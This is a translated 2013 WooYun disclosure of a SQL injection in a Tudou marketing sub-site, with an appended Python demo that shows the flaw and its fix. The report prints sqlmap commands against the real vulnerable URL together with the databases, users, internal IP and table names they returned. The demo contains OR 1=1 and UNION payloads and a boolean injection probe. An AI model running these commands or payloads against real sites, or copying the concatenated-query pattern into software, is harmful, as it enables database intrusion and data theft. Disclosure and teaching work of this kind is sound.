
Vulnerability summary

Defect ID: wooyun-2013-035701

Title: A SQL injection vulnerability in a Tudou sub-site

Vendor: Tudou (土豆网)

Author: 风仔

Submitted: 2013-08-30 18:00

Fixed: 2013-10-14 18:01

Published: 2013-10-14 18:01

Type: SQL injection

Severity: Medium

Self-assessed Rank: 6

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2013-08-30: Details sent to the vendor, awaiting vendor response
2013-08-31: Vendor confirmed; details visible to the vendor only
2013-09-10: Details disclosed to core white hats and domain experts
2013-09-20: Details disclosed to regular white hats
2013-09-30: Details disclosed to intern white hats
2013-10-14: Details disclosed to the public

Brief description:

A single SQL injection, stumbled on by accident, nothing technically demanding. The site seems not to have been updated in a long time, and the database server appears to sit on the internal network (10.25.10.10), so there is a risk of further penetration.
It also looks like someone from a certain Wahaha technical team has already paid a visit; whether those kids will go further, or already have, the gurus at Tudou and Youku should check after patching!

Detailed description:

python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --current-db
current database: 'marketing_db'
python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --users
database management system users [1]:
[*] 'mktapp'@'10.25.10.10_'
python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --dbs
available databases [4]:
[*] information_schema
[*] marketing_db
[*] test
[*] wahaha
python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --tables -D "marketing_db"
Database: marketing_db
[55 tables]
+-----------------------+
| adm_access |
| adm_func |
| adm_user |
| admin_info |
| hack |
| ipdate |
| log_video_player |
| mkt_behavior |
| mkt_comment |
| mkt_configure |
| mkt_counter |
| mkt_creation |
| mkt_creation2 |
| mkt_creation4 |
| mkt_creation_bankcomm |
| mkt_crontab |
| mkt_event |
| mkt_event_demo |
| mkt_media_etl |
| mkt_misc |
| mkt_partner |
| mkt_scenario |
| mkt_scenario_stat |
| mkt_scene |
| mkt_score |
| mkt_stock |
| mkt_tree |
| mkt_unit |
| mkt_upload |
| mkt_view |
| mkt_visitor |
| mkt_visitor_extend |
| msg_hits |
| msg_records |
| msg_users |
| skip |
| tb_jscm_rank |
| tb_jscm_recod |
| tb_list |
| tb_manager |
| tb_mc_blog |
| tb_shcm_candidate |
| tb_shcm_wlan |
| tb_vote_limit |
| teaser_emails |
| tt_admin |
| tt_event |
| tt_page |
| tt_rank |
| tt_ria |
| tt_video |
| unt_levis_num |
| user_list |
| user_lucky |
| userinfo |
+-----------------------+
python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --tables -D "wahaha"
Database: wahaha
[44 tables]
+------------+
| test |
| whha_1 |
| whha_10 |
| whha_2 |
| whha_3 |
| whha_4 |
| whha_5 |
| whha_6 |
| whha_7 |
| whha_8 |
| whha_9 |
| whha_ah |
| whha_award |
| whha_bj |
| whha_cq |
| whha_f |
| whha_fj |
| whha_gd |
| whha_gq |
| whha_gx |
| whha_gz |
| whha_hb |
| whha_hlj |
| whha_hn |
| whha_hub |
| whha_hun |
| whha_hz |
| whha_jl |
| whha_js |
| whha_jx |
| whha_ln |
| whha_nmg |
| whha_nx |
| whha_sax |
| whha_sc |
| whha_sd |
| whha_sh |
| whha_shx |
| whha_sx |
| whha_t |
| whha_tj |
| whha_xj |
| whha_yn |
| whha_zj |
+------------+

Proof of vulnerability:

Same sqlmap runs as shown under the detailed description above.

Fix recommendation:

You know what to do O(∩_∩)O~

Copyright notice: when reposting, please credit the source 风仔@乌云
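The report leaves the fix as "you know what to do". As an added example, not part of the original report or of Tudou's code, the following rebuilds the pattern behind a vulnerable `list.php?j=...` handler in Python on an in-memory SQLite database, puts the parameterized fix next to it, and includes the true/false boolean probe that sqlmap automates when it confirms an injectable parameter. The table `mkt_event`, its columns and rows, and the handler names are constructed for the demo; the real application was PHP on MySQL, where the equivalent fix is a mysqli or PDO prepared statement with the integer bound as a parameter.

```python
import re
import sqlite3

# Constructed sample data standing in for the marketing database; the table
# name echoes one from the report's table list, the rows are invented.
SCHEMA = """
CREATE TABLE mkt_event (id INTEGER PRIMARY KEY, title TEXT, published INTEGER);
INSERT INTO mkt_event VALUES (129138534, 'Toys R Us China campaign', 1);
INSERT INTO mkt_event VALUES (129138535, 'Unpublished draft', 0);
"""


def connect():
    """Fresh in-memory database loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def list_vulnerable(conn, j):
    """The pattern behind an injectable list.php?j=...: the request value is
    concatenated into the SQL text, so it can escape the WHERE clause and
    append its own logic (OR 1=1, UNION SELECT, AND 1=2 for blind probing)."""
    sql = "SELECT id, title FROM mkt_event WHERE published = 1 AND id = " + j
    return conn.execute(sql).fetchall()


def list_fixed(conn, j):
    """Hardened handler: reject anything that is not a plain integer, then
    bind the value as a parameter so the query text never changes."""
    if not re.fullmatch(r"[0-9]{1,18}", j):
        raise ValueError("j must be a positive integer")
    sql = "SELECT id, title FROM mkt_event WHERE published = 1 AND id = ?"
    return conn.execute(sql, (int(j),)).fetchall()


def boolean_probe(conn, handler, j):
    """Bare-bones version of the boolean-based check sqlmap automates: an
    always-true condition must leave the response unchanged and an
    always-false condition must change it. Returns True when the handler
    behaves like an injectable endpoint, False when it does not."""
    def respond(param):
        try:
            return handler(conn, param)
        except (ValueError, sqlite3.Error):
            return None

    baseline = respond(j)
    return (respond(j + " AND 1=1") == baseline
            and respond(j + " AND 1=2") != baseline)


if __name__ == "__main__":
    conn = connect()
    print("normal:  ", list_vulnerable(conn, "129138534"))
    print("OR 1=1:  ", list_vulnerable(conn, "0 OR 1=1"))
    # The UNION trick is what sqlmap's --dbs/--tables rely on; sqlite_master
    # plays the role MySQL's information_schema played in the report.
    print("UNION:   ", list_vulnerable(conn, "0 UNION SELECT 1, name FROM sqlite_master"))
    print("probe vulnerable:", boolean_probe(conn, list_vulnerable, "129138534"))
    print("probe fixed:     ", boolean_probe(conn, list_fixed, "129138534"))
```

The `OR 1=1` payload pulls the unpublished row past the `published = 1` filter, and the `UNION` payload reads table names out of the schema catalogue, which is exactly how the `--tables` enumeration in the report worked against MySQL. The fixed handler rejects both payloads before they reach the database, and the probe can no longer tell a true condition from a false one. Note that the database account in the report could see four databases, including an unrelated `wahaha` schema; a dedicated account with rights only on `marketing_db` would have limited what the injection could reach even before the code was fixed.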


Vulnerability response

Vendor response:

Severity: Medium

Rank: 10

Confirmed: 2013-08-31 13:35

Vendor reply:

Third-party business, already handled, thanks.

Latest status:

None